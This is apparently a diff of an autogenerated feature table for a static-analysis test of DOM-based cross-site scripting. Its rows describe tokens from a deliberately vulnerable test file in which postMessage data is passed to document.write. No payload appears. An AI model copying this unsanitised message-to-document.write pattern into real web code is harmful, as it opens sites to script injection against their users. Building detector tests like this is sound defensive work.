data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:5:33 | this | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:5:33 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | 'arguments' object of anonymous function | enclosingFunctionBody | data document write data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | 'arguments' object of anonymous function | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | 'arguments' object of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | exceptional return of anonymous function | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | exceptional return of anonymous function | enclosingFunctionBody | data document write data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | exceptional return of anonymous function | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | exceptional return of anonymous function | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | this.addEventListener | | autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | functio ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | functio ... OT OK\\n} | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | | autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (?) | | autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | functio ... OT OK\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | return of anonymous function | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | return of anonymous function | enclosingFunctionBody | data document write data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | return of anonymous function | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:7:1 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:43:5:48 | data | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:43:5:48 | data | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:43:5:48 | data | enclosingFunctionBody | data document write data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:43:5:48 | data | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:43:5:48 | data | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:43:5:48 | {data} | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:43:5:48 | {data} | contextSurroundingFunctionParameters | (?) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:43:5:48 | {data} | enclosingFunctionBody | data document write data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:43:5:48 | {data} | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:43:5:48 | {data} | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | contextSurroundingFunctionParameters | (?) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | contextSurroundingFunctionParameters | (?) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | enclosingFunctionBody | data document write data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | enclosingFunctionBody | data document write data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | enclosingFunctionBody | data document write data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | enclosingFunctionBody | data document write data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:44:5:47 | data | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:12 | document | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:12 | document | contextSurroundingFunctionParameters | (?) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:12 | document | enclosingFunctionBody | data document write data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:12 | document | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:12 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:18 | document.write | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:18 | document.write | contextSurroundingFunctionParameters | (?) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:18 | document.write | enclosingFunctionBody | data document write data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:18 | document.write | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:18 | document.write | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:24 | document.write(data) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:24 | document.write(data) | contextSurroundingFunctionParameters | (?) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:24 | document.write(data) | enclosingFunctionBody | data document write data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:24 | document.write(data) | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:24 | document.write(data) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:24 | exceptional return of document.write(data) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:24 | exceptional return of document.write(data) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:24 | exceptional return of document.write(data) | enclosingFunctionBody | data document write data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:24 | exceptional return of document.write(data) | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:5:6:24 | exceptional return of document.write(data) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:14:6:18 | write | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:14:6:18 | write | contextSurroundingFunctionParameters | (?) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:14:6:18 | write | enclosingFunctionBody | data document write data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:14:6:18 | write | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:6:14:6:18 | write | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:6:20:6:23 | data | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/addEventListener.js:6:20:6:23 | data | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/addEventListener.js:6:20:6:23 | data | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | @@ -11826,6 +89759,127 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/addEventListener.js:6:20:6:23 | data | enclosingFunctionName | addEventListener#functionalargument | | autogenerated/Xss/DomBasedXss/addEventListener.js:6:20:6:23 | data | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:6:20:6:23 | data | receiverName | document | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:9:0 | this | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:9:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:9:0 | this | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:9:0 | this | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:9:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:30:1 | 'arguments' object of function test | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:30:1 | 'arguments' object of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:30:1 | 'arguments' object of function test | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:30:1 | 'arguments' object of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:30:1 | 'arguments' object of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:30:1 | exceptional return of function test | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:30:1 | exceptional return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:30:1 | exceptional return of function test | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:30:1 | exceptional return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:30:1 | exceptional return of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:30:1 | functio ... }\\n} | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:30:1 | functio ... }\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:30:1 | functio ... }\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:30:1 | return of function test | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:30:1 | return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:30:1 | return of function test | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:30:1 | return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:1:30:1 | return of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:10:9:13 | test | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:10:9:13 | test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/addEventListener.js:9:10:9:13 | test | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:10:4 | this | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:10:4 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:10:4 | this | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:10:4 | this | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:10:4 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | 'arguments' object of function foo | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | 'arguments' object of function foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | 'arguments' object of function foo | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | 'arguments' object of function foo | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | 'arguments' object of function foo | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | exceptional return of function foo | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | exceptional return of function foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | exceptional return of function foo | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | exceptional return of function foo | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | exceptional return of function foo | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | functio ... K\\n } | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | functio ... K\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | functio ... K\\n } | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | functio ... K\\n } | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | functio ... K\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | return of function foo | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | return of function foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | return of function foo | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | return of function foo | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:5:14:5 | return of function foo | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:14:10:16 | foo | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:14:10:16 | foo | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:14:10:16 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:14:10:16 | foo | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:14:10:16 | foo | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:14:10:16 | foo | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:14:10:16 | foo | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:14:10:16 | foo | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:14:10:16 | foo | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:14:10:16 | foo | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:18:10:18 | x | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:18:10:18 | x | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:18:10:18 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:18:10:18 | x | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:18:10:18 | x | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:18:10:18 | x | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:18:10:18 | x | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:18:10:18 | x | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:18:10:18 | x | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:18:10:18 | x | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:21:10:25 | event | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:21:10:25 | event | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:21:10:25 | event | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:21:10:25 | event | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:21:10:25 | event | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:21:10:25 | event | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:21:10:25 | event | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:21:10:25 | event | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:21:10:25 | event | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:21:10:25 | event | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:28:10:28 | y | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:28:10:28 | y | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:28:10:28 | y | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:28:10:28 | y | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:28:10:28 | y | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:28:10:28 | y | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:28:10:28 | y | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:28:10:28 | y | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:28:10:28 | y | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:10:28:10:28 | y | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:16 | document | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:16 | document | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:16 | document | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:16 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:16 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:22 | document.write | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:22 | document.write | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:22 | document.write | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:22 | document.write | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:22 | document.write | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:30 | documen ... x.data) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:30 | documen ... x.data) | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:30 | documen ... x.data) | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:30 | documen ... x.data) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:30 | documen ... x.data) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:30 | exceptional return of documen ... x.data) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:30 | exceptional return of documen ... x.data) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:30 | exceptional return of documen ... x.data) | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:30 | exceptional return of documen ... x.data) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:9:11:30 | exceptional return of documen ... x.data) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:18:11:22 | write | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:18:11:22 | write | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:18:11:22 | write | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:18:11:22 | write | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:18:11:22 | write | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:24:11:24 | x | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:24:11:24 | x | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:24:11:24 | x | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:24:11:24 | x | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:24:11:24 | x | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:11:24:11:29 | x.data | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/addEventListener.js:11:24:11:29 | x.data | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/addEventListener.js:11:24:11:29 | x.data | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | @@ -11834,6 +89888,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/addEventListener.js:11:24:11:29 | x.data | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/addEventListener.js:11:24:11:29 | x.data | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:11:24:11:29 | x.data | receiverName | document | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:26:11:29 | data | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:26:11:29 | data | contextSurroundingFunctionParameters | (x, event, y) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:26:11:29 | data | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:26:11:29 | data | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:11:26:11:29 | data | 